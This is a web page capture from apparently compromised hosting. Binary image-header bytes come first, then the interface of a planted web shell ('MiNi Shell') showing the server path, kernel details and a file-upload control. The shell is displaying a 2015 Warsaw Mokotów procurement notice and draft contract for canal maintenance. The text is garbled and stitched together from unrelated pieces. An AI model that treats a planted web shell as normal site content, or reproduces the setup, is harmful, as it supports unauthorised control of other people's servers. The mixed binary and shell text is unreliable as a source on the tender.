JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150205/16019-N-2015.html

<p class="kh_header"><b>Warszawa: Bieżące utrzymanie kanału Piaseczyńskiego</b><br>
<b>Numer ogłoszenia: 16019 - 2015; data zamieszczenia: 05.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Mokotów , ul. Rakowiecka 25/27, 02-517 Warszawa, woj. mazowieckie, tel. 022 5651562, faks 022 5651562.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie kanału Piaseczyńskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ręczne usuwanie namułów, oczyszczanie z namułów przepustów, usuwanie z dna rowu roślin, samosiewów, zanieczyszczeń z wywozem, kontrola i obsługa 3 przepustów i 1 zasuwy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.64.10.00-2, 90.51.10.00-2.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na wykonaniu prac związanych z  konserwacją zbiorników wodnych lub rowów melioracyjnych o wartości nie mniejszej niż 25.000 zł brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie do kierowania pracami o charakterze technicznym, co najmniej jednej osoby, która posiada wykształcenie co najmniej średnie o profilu melioracje wodne</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Należy wykazać co najmniej jedną  usługę  polegającą na wykonaniu prac związanych z konserwacją zbiorników wodnych  lub rowów melioracyjnych  o wartości  nie  mniejszej  niż   25 000,00 zł brutto.

Zamawiający nie wymaga wykazania usług niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie podmiotów oddających do dyspozycji wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia  -  w formie oryginałów w przypadku, gdy wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków w szczególności, /wzór druku załącznik nr 6 do wniosku o dopuszczenie do udziału w licytacji elektronicznej/.
Zamawiający wymaga aby składany dokument w szczególności zawierał informacje:
- jaki rodzaj zasobu jest udostępniany,
- w jakiej formie podmiot udostępniający zasób będzie uczestniczył w realizacji zamówienia,
- w jakim okresie podmiot udostępniający zasób będzie uczestniczył w realizacji zamówienia,
- jaki stosunek łączy wykonawcę z podmiotem udostępniającym zasób.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
Pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia.
Pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, w przypadku, gdy Wykonawcę reprezentuje pełnomocnik.
-Pełnomocnictwo należy przedłożyć w oryginale lub notarialnie potwierdzonej kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://aukcje.um.warszawa.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.mokotow.waw.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wykonawca ma prawo złożyć tylko jeden wniosek o dopuszczenie do udziału w licytacji elektronicznej. Złożenie większej liczby wniosków, spowoduje odrzucenie wszystkich wniosków złożonych przez danego Wykonawcę.
2. Wniosek oraz wszelkie dokumenty wymagane muszą spełniać następujące wymogi:
a. wniosek musi zostać sporządzony w języku polskim z zachowaniem formy pisemnej na maszynie do pisania, komputerze, ręcznie długopisem czytelnym pismem.
b. formularz wniosku i wszystkie załączane dokumenty sporządzone przez Wykonawcę muszą być podpisane; za podpisanie uznaje się własnoręczny podpis z pieczątką imienną przez osobę upoważnioną do reprezentowania zgodnie z formą reprezentacji Wykonawcy określoną w dokumencie rejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej,
c. w przypadku, gdy Wykonawcę reprezentuje pełnomocnik do wniosku musi być załączone pełnomocnictwo, określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopii
d. pozostałe oświadczenia i dokumenty  muszą być oryginałami lub kserokopiami poświadczonymi na każdej stronie za zgodność z oryginałem przez właściwą osobę, zgodnie z zasadą  oraz muszą być one sporządzone w języku polskim,
e. poprawki lub zmiany ,również przy użyciu korektora, we wniosku, powinny być parafowane własnoręcznie przez osobę podpisującą wniosek,
f. dokumenty składające się na wniosek muszą być sporządzone wg wzorów i wymogów ,
g. dokumenty sporządzone w języku obcym, muszą być składane wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę
Wzór wniosku o dopuszczenie do udziału w licytacji elektronicznej załącznik nr 1 do treści ogłoszenia dostępny na stronie www.mokotow.waw.pl
Wniosek wraz z załącznikami  należy złożyć w zamkniętej kopercie opatrzonej co najmniej  nazwą przedmiotu zamówienia.
3. Komputer użytkownika powinien spełniać następujące wymagania:
być wyposażony w procesor 733 MHz i posiadać co najmniej 512 MB pamięci RAM
 posiadać zainstalowany system operacyjny MS Windows XP lub nowszy
posiadać zainstalowaną przeglądarkę internetową Microsoft Internet Explorer 6.0. lub nowszą albo Mozilla Firefox 2.x lub nowszą
posiadać połączenie z siecią Internet o szybkości transmisji nie mniejszej niż 128 kb s..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> W trakcie licytacji Wykonawca licytuje cenę brutto za całość zamówienia. 
Minimalne postąpienie wynosi 300,00 zł brutto.
Cena wywoławcza za całość zamówienia wynosi  30.985,97 zł brutto.

 W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim wykonawcom informacje o pozycji składanych przez nich ofert, liczbie wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. 
  Cena ofertowa winna obejmować wszystkie koszty i składniki wraz z narzutami, niezbędne do wykonania przedmiotu zamówienia. Zamawiający nie zapewnia zwolnienia Wykonawcy z żadnych podatków, opłat, ani nie będzie zwracał żadnych kar należnych z jakiegokolwiek tytułu, cen transportu, czynności, usług, świadczeń, opłat, ceł, podatków itp.,  Ryzyko konieczności wykonania wszelkich prac towarzyszących, mogących pojawić się w trakcie realizacji zamówienia, ryzyko związane ze zmianami kursów walut, ceł itp., obciąża Wykonawcę i należy uwzględnić je w ofercie.
   Zaproponowana przez Wykonawcę  cena będzie stała w czasie objętym umową. Zapłata nastąpi zgodnie z warunkami umowy. 
Za ofertę najkorzystniejszą zostanie uznana oferta, która zawierać będzie, w chwili zamknięcia licytacji elektronicznej, najniższą cenę brutto realizacji całego zamówienia. Wykonawca, który zaproponował najniższą cenę brutto realizacji przedmiotowego zamówienia, zostaje zwycięzcą licytacji elektronicznej.
  Operator platformy aukcyjnej przekazuje zakwalifikowanym przez Zamawiającego Wykonawcom informację o sposobie rejestracji na platformie aukcyjnej. W trakcie rejestracji Wykonawca otrzyma kod dostępu do platformy aukcyjnej. Otrzymany kod dostępu Wykonawca będzie musiał zmienić na nowy - określony przez siebie. 
Zamawiający podpisze umowę,  z  Wykonawcą, który w chwili zamykania licytacji elektronicznej zaproponował najniższą cenę realizacji przedmiotowego zamówienia. 
Po zamknięciu licytacji elektronicznej, w terminie wyznaczonym przez Zamawiającego, Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązek przekazać Zamawiającemu wypełniony formularz cenowy stanowiący załącznik nr 1 do wzoru umowy dostępny na stronie internetowej zamawiającego: www.mokotow.waw.pl
Wszystkie ceny muszą być wyrażone z dokładnością do dwóch miejsc po przecinku w rozumieniu ustawy z dnia 5 lipca 2001 r. o cenach /Dz. U. z 2002r. Nr 97, poz. 1050, ze zm./ oraz ustawy z dnia 7 lipca 1994 r. o denominacji złotego /Dz. U. z 1994 r., Nr 84, poz. 386 ze zm./.
O miejscu i terminie zawarcia umowy Wykonawca zostanie poinformowany przez Zamawiającego po dostarczeniu w/w dokumentu..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 10 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 13.02.2015 godzina 11:00, miejsce: siedziba zamawiającego, pok. 35A, wejście /E/.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Nie krótszy niż 5 dni od dnia przekazania zaproszeń.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Zamawiający zamyka licytację gdy w podstawowym czasie nie zostanie złożona żadna oferta lub, gdy w ciągu 5 minut od złożenia oferty przez jednego z wykonawców nie zostanie złożona inna oferta,</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Nie dotyczy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>UMOWA NR MOK-4OŚ/B/III/2/3/ /2015 
Zawarta w dniu /wykropkowania/ w Warszawie pomiędzy:
Miastem Stołecznym Warszawa Dzielnicą Mokotów z siedzibą przy ul. Rakowieckiej 25/27
reprezentowanym na podstawie pełnomocnictwa Prezydenta m. st. Warszawy z dnia 
/wykropkowania/ oraz pełnomocnictwa Prezydenta m. st. Warszawy z dnia /wykropkowania/ przez:
/wykropkowania/ - /wykropkowania/
zwanym dalej ZAMAWIAJĄCYM,
a
/wykropkowania/
zwanym w dalszej części umowy /WYKONAWCĄ/, wyłonionym w postępowaniu o udzielenie zamówienia publicznego w trybie Licytacji elektronicznej na podstawie art. 74 ustawy Prawo zamówień publicznych /Dz. U.  2013r. 907 ze zm. /, została zawarta Umowa o następującej treści:
§ 1
1.Zamawiający powierza, a  Wykonawca zobowiązuje się wykonać prace polegające na 
bieżącym utrzymaniu kanału Piaseczyńskiego / odcinek odkryty/ , zwane dalej 
/pracami/.
2. Szczegółowy zakres  prac określony jest formularzu cenowym ofertowym / załącznik nr 1 
do umowy/ oraz opisie przedmiotu zamówienia / załącznik nr 2do umowy/.
§ 2
Termin realizacji umowy ustala się od daty jej zawarcia do 31.10 2015 r.
§ 3
Przystąpienie do wykonywania prac przez Wykonawcę nastąpi następnego dnia po zawarciu niniejszej umowy.
§ 4
1.Za prawidłowe wykonanie prac Zamawiający zapłaci Wykonawcy wynagrodzenie nie większe niż:
brutto:  /wykropkowania/ zł 
słownie : /wykropkowania/
zgodnie  z formularzem cenowym ofertowym, stanowiącym załącznik nr 1 do umowy
2.Ostateczna wysokość wynagrodzenia, o którym mowa w ust.1 wynikać będzie z ilości faktycznie wykonanych przez Wykonawcę czynności,  pomnożonych przez ceny jednostkowe określone w formularzu cenowym ofertowym, stanowiącym załącznik nr 1  do niniejszej umowy. 
3.Ceny jednostkowe w formularzu cenowym ofertowym nie ulegną podwyższeniu w czasie realizacji całego przedmiotu zamówienia.
§ 5
1.Strony umowy ustalają, że Wykonawca będzie przystępował do realizacji poszczególnych czynności na podstawie oświadczeń Zamawiającego określających zakres prac, miejsce                 i termin ich wykonania. Oświadczenia będą przekazywane Wykonawcy osobiście, telefonicznie pod nr /wykropkowania/, faksem pod nr /wykropkowania/ lub elektronicznie na adres: /wykropkowania/
2.O wykonaniu prac Wykonawca zawiadomi Zamawiającego w formie pisemnej . 
3.Zamawiający przystąpi do czynności odbiorowych w terminie do 3 dni od otrzymania zawiadomienia o wykonaniu prac . O terminie i miejscu czynności odbiorowych Zamawiający  zawiadomi Wykonawcę z co najmniej 1 dniowym wyprzedzeniem. Nieobecność Wykonawcy nie stanowi przeszkody do dokonania czynności odbiorowych ,             a ustalenia odbiorowe są wówczas  wiążące dla Wykonawcy. 
4.Prace objęte niniejszą umową uważa się za wykonane w dniu tego zawiadomienia Zamawiającego , po którym nastąpił odbiór prac bez zastrzeżeń.
5.Jeżeli podczas odbioru prac zastaną stwierdzone  wady Zamawiający ma prawo odmówić  odbioru  prac do czasu usunięcia wad, wyznaczając jednocześnie termin technicznie uzasadniony na ich usunięcie.
6.W razie odmowy odbioru prac przez Zamawiającego z przyczyn podanych w ust 5, prace uważa się za prawidłowo wykonane w terminie w którym nastąpiło zawiadomienie o ich wykonaniu, po którym bezpośrednio nastąpił ich odbiór przez Zamawiającego bez zastrzeżeń.
7.Do odbioru prac uprzednio nieodebranych jako wadliwych Zamawiający jest obowiązany
przystąpić niezwłocznie po doręczeniu zgłoszenia przez Wykonawcę o usunięciu wad. 
Z czynności odbiorowych, prac uprzednio nieodebranych jako wadliwych strony umowy
sporządzają każdorazowo protokół.
8. Zamawiający zastrzega sobie prawo do zapłaty wynagrodzenia tylko za prace faktycznie wykonane przez Wykonawcę i odebrane przez Zamawiającego bez zastrzeżeń, a Wykonawcy nie  przysługują w stosunku do Zamawiającego roszczenia o wypłatę wynagrodzenia w kwocie maksymalnej, określonej w § 4 ust.1 umowy. 
9. Strony umowy ustalają, iż będą dokonywały w okresie obowiązywania umowy rozliczeń finansowych obejmujących poszczególne miesiące kalendarzowe wykonywania prac. Podstawą do wystawienia faktur częściowych za dany miesiąc będą formularze powykonawcze obejmujące rzeczywiste obmiary prac i ceny jednostkowe oraz protokoły odbioru wszystkich prac wykonanych w danym miesiącu , podpisane i zaakceptowane przez Zamawiającego.  
10.Wynagrodzenie Wykonawcy płatne będzie przelewem przez Zamawiającego na konto Wykonawcy /wykropkowania/
w terminie 21 dni od daty złożenia prawidłowo wystawionej faktury VAT wraz  z protokółem odbioru prac ,  w którym Zamawiający potwierdził prawidłowe wykonanie prac i ich zakres. Faktury muszą być wystawione w okresie do 7 dni od daty podpisania  protokółu odbioru prac przez Zamawiającego i dostarczone najpóźniej w ciągu 7 dni od daty ich  wystawienia. 
Za termin zapłaty uznaje się dzień obciążenia rachunku Zamawiającego  poleceniem zapłaty.
11.Strony zgodnie ustalają, że zmiana numeru rachunku Wykonawcy nie powoduje potrzeby sporządzania aneksu do umowy. Wykonawca obowiązany jest do powiadomienia Zamawiającego  na piśmie o zmianie  numeru swojego rachunku. 
12.Faktura musi być wystawiona na : nabywca: Miasto Stołeczne Warszawa Plac Bankowy 3/5 NIP 525-22-48-481 płatnik: Urząd m.st. Warszawy  Dzielnica Mokotów  i dostarczona do Wydziału Ochrony Środowiska dla Dzielnicy Mokotów Warszawa, ul. Wiktorska 91 A.
§ 6
1.Pracownicy Wykonawcy wykonujący pracę objęte umową oraz pojazdy służące do realizacji zadań Wykonawcy w wykonaniu umowy muszą być zaopatrzone w czytelne logo Wykonawcy umieszczone w widocznym miejscu na pojeździe oraz na ubraniu pracowników.
2. Wykonawca ponosi odpowiedzialność za wszelkie szkody powstałe w związku wykonywaniem prac, stanowiących przedmiot umowy.
3.Bez zgody Zamawiającego , Wykonawca nie może powierzyć wykonania umowy w całości lub części osobie trzeciej.
§ 7
1.Zamawiający ma prawo kontroli prac wykonywanych przez Wykonawcę. 
2.Na żądanie Zamawiającego Wykonawca zobowiązany jest do natychmiastowego
skierowania swego przedstawiciela do udziału w kontroli.
3. Z czynności kontrolnych Zamawiający sporządza protokół zawierający ustalenia dokonane podczas kontroli.
§ 8
1.Strony umowy ustalają, iż Wykonawca zapłaci Zamawiającemu kary umowne                 w następujących przypadkach i wysokościach:
1/ za  zwłokę w  wykonaniu całości lub części prac objętych oświadczeniem, o którym mowa w § 5 ust. 1 umowy, w wysokości 0,2% wynagrodzenia umownego brutto, określonego w § 4 ust.1,  za każdy rozpoczęty dzień zwłoki, liczonej od dnia w którym prace miały być wykonane do dnia zgłoszenia wykonania prac, po którym nastąpił ich odbiór przez  Zamawiającego  bez zastrzeżeń albo do dnia rozwiązania umowy; 
2/ z tytułu wypowiedzenia umowy bez zachowania okresu wypowiedzenia przez Wykonawcę lub Zamawiającego z przyczyn leżących po stronie Wykonawcy, w wysokości 20%  wynagrodzenia brutto umowy, o którym mowa w § 4 ust. 1 umowy.
2.Wykonawca wyraża zgodę na potrącenie przez Zamawiającego kar umownych z wynagrodzenia za wykonane prace bez dodatkowych wezwań do zapłaty.
§ 9
Strony umowy zgodnie ustalają , że Zamawiający poza przypadkami uprawniającymi do wypowiedzenia umowy bez zachowania okresu wypowiedzenia wynikającymi z przepisów prawa, może wypowiedzieć  umowę  bez zachowania okresu wypowiedzenia w następujących przypadkach :
1/ zwłoki Wykonawcy w prawidłowym wykonaniu całości lub części prac, bądź zwłoki w usunięciu wad w pracach, przekraczających o co najmniej 7 dni termin ustalony w oświadczeniu, o którym mowa w § 5 ust. 1 umowy;
2/ zajęcia przez organ egzekucyjny wierzytelności Wykonawcy z tytułu wykonania niniejszej umowy w terminie do 14 dni od uzyskania informacji o zajęciu wierzytelności.
§ 10
1.Strony ustalają, że niezależnie od kar umownych, o których mowa w §  8 niniejszej umowy, Zamawiający będzie mógł dochodzić odszkodowania uzupełniającego do wysokości
rzeczywiście poniesionej szkody na zasadach ogólnych przewidzianych w kodeksie cywilnym.
